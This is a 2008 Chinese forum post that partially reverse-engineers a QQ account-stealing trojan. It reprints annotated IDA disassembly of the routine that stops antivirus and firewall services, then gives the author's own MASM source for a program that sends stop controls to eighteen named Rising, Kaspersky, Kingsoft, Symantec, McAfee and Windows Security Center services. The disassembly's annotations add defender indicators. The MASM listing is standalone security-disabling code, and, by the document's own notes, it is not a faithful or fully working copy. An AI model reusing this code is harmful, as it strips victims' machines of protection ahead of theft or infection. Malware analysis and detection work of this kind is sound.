发表于:2008-02-26 17:02:30

不完全逆向分析啊拉QQ大盗

不完全逆向分析啊拉QQ大盗
文章作者:asm[C.R.S.T]
信息来源:邪恶八进制信息安全团队
啊拉QQ大盗有几个部分,大家看一下他的功能:


运行后关闭QQ,安装后删除自身,过滤重复号码,彻底坠毁防火墙等等.其中我最感兴趣的还是看看啊拉QQ大盗是怎么坠毁防火墙的,故挑了重点对它进行逆向分析.这个服务端是加了个壳.我对脱壳白痴,所以叫冷血书生帮我脱了.废话少说,下面是反汇编代码:

; Excerpt from the unpacked sample (IDA listing, 32-bit x86). The enclosing routine
; starts before this excerpt, so only the visible instructions are described.
; Each mov/call pair loads the address of one service-name string into eax and calls
; sub_4095FC; per the listing of sub_4095FC on this page, that routine opens the named
; service through the service control manager and sends it a stop control.
; The article describes the names as common antivirus services; wscsvc is the Windows
; Security Center service. Presumed vendors, inferred from the names (verify before use):
; Rising (RsCCenter), Jiangmin (KVSrvXP), Kaspersky (kavsvc), Kingsoft (KPfwSvc, KWatchSvc),
; Symantec/Norton (SNDSrvc, ccProxy, ccEvtMgr, ccSetMgr, SPBBCSvc, Symantec Core LC,
; navapsvc, NPFMntor), McAfee (MskService, McTaskManager, McShield, McAfeeFramework).
; Defender note: one process issuing stop requests against a run of security-product
; services is a strong behavioural indicator; service state changes are normally recorded
; by the Service Control Manager in the System event log (event 7036 -- confirm on the
; platform in use).
.shrink:0040A0AA          mov  eax, offset s_Rsccenter ; "RsCCenter"
.shrink:0040A0AF          call  sub_4095FC  ;stop the security-product service named in eax; repeated for every name below
.shrink:0040A0AF
.shrink:0040A0B4          mov  eax, offset s_Kvsrvxp ; "KVSrvXP"
.shrink:0040A0B9          call  sub_4095FC   
.shrink:0040A0B9
.shrink:0040A0BE          mov  eax, offset s_Kavsvc ; "kavsvc"
.shrink:0040A0C3          call  sub_4095FC   
.shrink:0040A0C3
.shrink:0040A0C8          mov  eax, offset s_Kpfwsvc ; "KPfwSvc"
.shrink:0040A0CD          call  sub_4095FC   
.shrink:0040A0CD
.shrink:0040A0D2          mov  eax, offset s_Kwatchsvc ; "KWatchSvc"
.shrink:0040A0D7          call  sub_4095FC   
.shrink:0040A0D7
.shrink:0040A0DC          mov  eax, offset s_Wscsvc ; "wscsvc"
.shrink:0040A0E1          call  sub_4095FC   
.shrink:0040A0E1
.shrink:0040A0E6          mov  eax, offset s_Sndsrvc ; "SNDSrvc"
.shrink:0040A0EB          call  sub_4095FC   
.shrink:0040A0EB
.shrink:0040A0F0          mov  eax, offset s_Ccproxy ; "ccProxy"
.shrink:0040A0F5          call  sub_4095FC   
.shrink:0040A0F5
.shrink:0040A0FA          mov  eax, offset s_Ccevtmgr ; "ccEvtMgr"
.shrink:0040A0FF          call  sub_4095FC   
.shrink:0040A0FF
.shrink:0040A104          mov  eax, offset s_Ccsetmgr ; "ccSetMgr"
.shrink:0040A109          call  sub_4095FC   
.shrink:0040A109
.shrink:0040A10E          mov  eax, offset s_Spbbcsvc ; "SPBBCSvc"
.shrink:0040A113          call  sub_4095FC   
.shrink:0040A113
.shrink:0040A118          mov  eax, offset s_SymantecCoreL ; "Symantec Core LC"
.shrink:0040A11D          call  sub_4095FC   
.shrink:0040A11D
.shrink:0040A122          mov  eax, offset s_Navapsvc ; "navapsvc"
.shrink:0040A127          call  sub_4095FC   
.shrink:0040A127
.shrink:0040A12C          mov  eax, offset s_Npfmntor ; "NPFMntor"
.shrink:0040A131          call  sub_4095FC   
.shrink:0040A131
.shrink:0040A136          mov  eax, offset s_Mskservice ; "MskService"
.shrink:0040A13B          call  sub_4095FC   
.shrink:0040A13B
.shrink:0040A140          mov  eax, offset s_Mctaskmanager ; "McTaskManager"
.shrink:0040A145          call  sub_4095FC   
.shrink:0040A145
.shrink:0040A14A          mov  eax, offset s_Mcshield ; "McShield"
.shrink:0040A14F          call  sub_4095FC   
.shrink:0040A14F
.shrink:0040A154          mov  eax, offset s_Mcafeeframewo ; "McAfeeFramework"
.shrink:0040A159          call  sub_4095FC   
.shrink:0040A159
.shrink:0040A15E
; Endless loop: call sub_409064 (its purpose is not shown on this page), sleep, repeat.
.shrink:0040A15E loc_40A15E:                  ; CODE XREF: .shrink:0040A16D j
.shrink:0040A15E          call  sub_409064
.shrink:0040A15E
.shrink:0040A163          push  0BB8h      
.shrink:0040A168          call  Sleep      ;sleep 3000 ms (0BB8h)
.shrink:0040A168
.shrink:0040A16D          jmp  short loc_40A15E
.shrink:0040A16D
  很明显,通过一个参数传递给sub_4095FC这个分支,而这个参数正好是一些常见的杀毒软件服务名称.所以这个函数应该这样构造:char sub_4095FC(int buffer)(C语言语法)把这个名称传递给sub_4095FC干什么捏?大家请看sub_4095FC这个分支:

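; sub_4095FC -- stop one Windows service by name (IDA listing of the unpacked sample, 32-bit x86).
; In:   eax = service-name string (register argument; stored to var_4 on entry).
; Flow: OpenSCManagerA -> OpenServiceA -> ControlService(dwControl = 1, SERVICE_CONTROL_STOP)
;       -> QueryServiceStatus, re-polled once per second while the state is 3 (SERVICE_STOP_PENDING).
; NOTE(review): the eax-passed argument, the fs:[0] frame and the sub_403xxx helpers look like
;       Delphi-compiled code using RTL string helpers -- inferred, not confirmed by this listing.
; Defender note: the caller needs rights to stop the target service (normally an administrator
;       token). A process that requests 0F003Fh on the SCM and 0F01FFh on security-product
;       services and then issues stop controls is a strong behavioural indicator.
.shrink:004095FC sub_4095FC    proc near      
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC                          
.shrink:004095FC
.shrink:004095FC var_4      = dword ptr -4 ;local copy of the argument passed in eax
.shrink:004095FC
.shrink:004095FC          push  ebp
.shrink:004095FD          mov  ebp, esp
.shrink:004095FF          push  ecx        ; reserves the 4-byte slot at [ebp-4] used as var_4
.shrink:00409600          push  ebx
.shrink:00409601          push  esi
.shrink:00409602          push  edi
.shrink:00409603          mov  [ebp+var_4], eax
.shrink:00409606          mov  eax, [ebp+var_4]
.shrink:00409609          call  sub_403ED0 ; helper not shown on this page; receives var_4 in eax
.shrink:00409609
; Build an exception frame (saved ebp, handler address, previous frame) and link it at fs:[0].
.shrink:0040960E          xor  eax, eax
.shrink:00409610          push  ebp
.shrink:00409611          push  offset s_SUIL_YN@ ; frame handler address. IDA rendered the code bytes there as a string and the author read it as encrypted data; the "_^[Y]" run in that string decodes as pop edi/esi/ebx/ecx/ebp, i.e. an epilogue, so it is most likely plain code
.shrink:00409616          push  dword ptr fs:[eax]
.shrink:00409619          mov  fs:[eax], esp
.shrink:0040961C          mov  eax, [ebp+var_4]
.shrink:0040961F          call  sub_403EE0 ; helper not shown; its result is used as lpServiceName below
.shrink:0040961F
.shrink:00409624          mov  esi, eax
.shrink:00409626          push  0F003Fh      ; dwDesiredAccess (0F003Fh = SC_MANAGER_ALL_ACCESS)
.shrink:0040962B          push  0          ; lpDatabaseName
.shrink:0040962D          push  0          ; lpMachineName
.shrink:0040962F          call  OpenSCManagerA ; open the service control manager (lpMachineName = 0)
.shrink:0040962F
.shrink:00409634          mov  edi, eax    ; keep the SCM handle in edi
.shrink:00409636          test  edi, edi    ; did the open succeed?
.shrink:00409638          jbe  short loc_4096A8 ; NULL handle (open failed): go to the exit path; otherwise fall through
.shrink:00409638
.shrink:0040963A          push  0F01FFh      ; dwDesiredAccess (0F01FFh = SERVICE_ALL_ACCESS)
.shrink:0040963F          push  esi        ; lpServiceName
.shrink:00409640          push  edi        ; hSCManager
.shrink:00409641          call  OpenServiceA  ; open the named security-product service
.shrink:00409641
.shrink:00409646          mov  esi, eax
.shrink:00409648          test  esi, esi
.shrink:0040964A          jbe  short loc_4096A2 ; open failed: close the SCM handle
.shrink:0040964A
.shrink:0040964C          push  offset ServiceStatus ; lpServiceStatus
.shrink:00409651          push  1          ; dwControl (1 = SERVICE_CONTROL_STOP)
.shrink:00409653          push  esi        ; hService
.shrink:00409654          call  ControlService ; ask the service to stop
.shrink:00409654
.shrink:00409659          test  eax, eax
.shrink:0040965B          jz    short loc_4096A8 ; call failed: exit path (neither handle is closed on this path)
.shrink:0040965B
.shrink:0040965D          push  3E8h        ; dwMilliseconds
.shrink:00409662          call  Sleep      ; sleep 1000 ms (3E8h is milliseconds, not seconds)
.shrink:00409662
.shrink:00409667          jmp  short loc_40967C
.shrink:00409667
.shrink:00409669 ; ---------------------------------------------------------------------------
.shrink:00409669
.shrink:00409669 loc_409669:                  
.shrink:00409669          cmp  ServiceStatus.dwCurrentState,3 ;is the state SERVICE_STOP_PENDING (3)?
.shrink:00409670          jnz  short loc_40968B
.shrink:00409670
.shrink:00409672          push  3E8h        ; dwMilliseconds
.shrink:00409677          call  Sleep      ;sleep 1000 ms, then poll again
.shrink:00409677
.shrink:0040967C
.shrink:0040967C loc_40967C:                  
.shrink:0040967C          push  offset ServiceStatus ; lpServiceStatus
.shrink:00409681          push  esi        ; hService
.shrink:00409682          call  QueryServiceStatus ; query the service's current status
.shrink:00409682
.shrink:00409687          test  eax, eax
.shrink:00409689          jnz  short loc_409669 ; query succeeded: check for STOP_PENDING and keep polling
.shrink:00409689
.shrink:0040968B
.shrink:0040968B loc_40968B:                  
.shrink:0040968B          cmp  ServiceStatus.dwCurrentState, 1
.shrink:00409692          jz    short loc_4096A8 ; state 1 = SERVICE_STOPPED: exit path without closing the handles
.shrink:00409692
.shrink:00409694          push  esi        ; hSCObject
.shrink:00409695          call  CloseServiceHandle ; close the service handle (this does not affect the service itself)
.shrink:00409695
.shrink:0040969A          push  edi        ; hSCObject
.shrink:0040969B          call  CloseServiceHandle
.shrink:0040969B
.shrink:004096A0          jmp  short loc_4096A8
.shrink:004096A0
.shrink:004096A2 ; ---------------------------------------------------------------------------
.shrink:004096A2
.shrink:004096A2 loc_4096A2:                  
.shrink:004096A2          push  edi        ; hSCObject
.shrink:004096A3          call  CloseServiceHandle ; close the SCM handle
.shrink:004096A3
.shrink:004096A8
; Exit path: unlink the exception frame by restoring the saved fs:[0] value.
.shrink:004096A8 loc_4096A8:                  
.shrink:004096A8                          
.shrink:004096A8                          
.shrink:004096A8                          
.shrink:004096A8          xor  eax, eax
.shrink:004096AA          pop  edx
.shrink:004096AB          pop  ecx
.shrink:004096AC          pop  ecx
.shrink:004096AD          mov  fs:[eax], edx
.shrink:004096B0          push  4096C5h ; address the retn below transfers to
.shrink:004096B5          lea  eax, [ebp+var_4]
.shrink:004096B8          call  sub_403B68 ; helper not shown; receives the address of var_4
.shrink:004096B8
.shrink:004096BD          retn             ; pops the pushed 4096C5h, so control continues there rather than in the caller
.shrink:004096BD
.shrink:004096BD sub_4095FC    endp ; sp = -18h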

原来是通过连接服务控制管理器(SCM)来停止服务:如果函数ControlService执行不成功,就关闭句柄退了出去;反之,查询ControlService调用之后返回的ServiceStatus结构,其成员dwCurrentState的值不再是SERVICE_STOP_PENDING时,就代表停止成功,就可以关闭这个服务的句柄了.其实这是很简单的.从防御角度看,向这些服务发送停止控制通常需要管理员权限,而安全软件服务被异常停止本身就是值得告警的行为.

    下面就给出汇编源代码



;******************************************************************
;程序编写by Asm
;日期:2007-3-07日
;出处:http://www.wolfexp.net/(红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组(http://www.wolfexp.net/)
;注意事项:公布源码仅限技术交流,如果使用引起的损失,由使用者自己全部负责!
;*****************************************************************

.386
.model flat, stdcall
option casemap :none

include windows.inc
include kernel32.inc
include advapi32.inc

includelib kernel32.lib
includelib advapi32.lib

_CloseService PROTO :DWORD

; Service short names handed to _CloseService; they are the same names that appear as
; string references in the disassembly of the sample.
; Defender use: treat them as indicators -- these are the services the sample tries to
; stop, so an unexpected stop request against any of them is worth alerting on.
.data
s_Rsccenter db "RsCCenter"
s_Kvsrvxp db "KVSrvXP"
s_Kavsvc db "kavsvc"
s_Kpfwsvc db "KPfwSvc"
s_Kwatchsvc db "KWatchSvc"
s_Wscsvc db "wscsvc"
s_Sndsrvc db "SNDSrvc"
s_Ccproxy db "ccProxy"
s_Ccevtmgr db "ccEvtMgr"
s_Ccsetmgr db "ccSetMgr"
s_Spbbcsvc db "SPBBCSvc"
s_SymantecCoreL db "Symantec Core LC"
s_Navapsvc db "navapsvc"
s_Npfmntor db "NPFMntor"
s_Mskservice db "MskService"
s_Mctaskmanager db "McTaskManager"
s_Mcshield db "McShield"
s_Mcafeeframewo db "McAfeeFramework"

.code
; _CloseService -- the article author's hand-written MASM approximation of sub_4095FC.
; In:   _Service = address of a service-name string.
; Calls OpenSCManager, OpenService (0F01FFh), ControlService(SERVICE_CONTROL_STOP),
;       Sleep(1000), QueryServiceStatus and CloseServiceHandle, and ends in ExitProcess.
; NOTE(review): this is not a faithful copy of the sample. The disassembly on this page
;       requests 0F003Fh from the SCM and polls the status in a loop, so detections should
;       be derived from the disassembly rather than from this listing.
_CloseService proc _Service
local hSCManager:DWORD
local hService:DWORD
local ServiceStatus:SERVICE_STATUS
  invoke OpenSCManager,NULL,NULL, SC_MANAGER_CREATE_SERVICE ;connect to the service control manager
  .if eax!=0
      mov  hSCManager, eax ;connected: keep the returned SCM handle
  .elseif
  jmp ExitSCManager
  .endif
      invoke OpenService, hSCManager,_Service,0F01FFh ;open the named service
      .if eax!=0
        mov hService,eax
    .elseif
    jmp ExitSCManager
      .endif
      invoke ControlService,hService,SERVICE_CONTROL_STOP,addr ServiceStatus ;send a stop control to the security product's service
      .if eax == NULL
      jmp ExitSCManager
      .endif
      invoke Sleep,1000
      invoke QueryServiceStatus,hService,addr ServiceStatus ;query the service status
      .if eax != NULL
      cmp ServiceStatus.dwCurrentState,SERVICE_STOP_PENDING ;author's note: the SERVICE_STOP_PENDING state is taken to mean the stop worked; both outcomes of this compare reach ColseIt
jnz ColseIt
      .endif
      
ColseIt:
; state 1 is compared against dwCurrentState; when equal, the handle closes below are skipped
cmp ServiceStatus.dwCurrentState,1h
jz ExitSCManager
invoke CloseServiceHandle,hService
invoke CloseServiceHandle,hSCManager

ExitSCManager:
invoke CloseServiceHandle, hSCManager
invoke ExitProcess,NULL
_CloseService endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Program entry point: passes the address of each service-name string in .data to
; _CloseService, in the same order as the calls to sub_4095FC in the disassembly.
start:
invoke _CloseService,addr s_Rsccenter
invoke _CloseService,addr s_Kvsrvxp
invoke _CloseService,addr s_Kavsvc
invoke _CloseService,addr s_Kpfwsvc
invoke _CloseService,addr s_Kwatchsvc
invoke _CloseService,addr s_Wscsvc
invoke _CloseService,addr s_Sndsrvc
invoke _CloseService,addr s_Ccproxy
invoke _CloseService,addr s_Ccevtmgr
invoke _CloseService,addr s_Ccsetmgr
invoke _CloseService,addr s_Spbbcsvc
invoke _CloseService,addr s_SymantecCoreL
invoke _CloseService,addr s_Navapsvc
invoke _CloseService,addr s_Npfmntor
invoke _CloseService,addr s_Mskservice
invoke _CloseService,addr s_Mctaskmanager
invoke _CloseService,addr s_Mcshield
invoke _CloseService,addr s_Mcafeeframewo
end start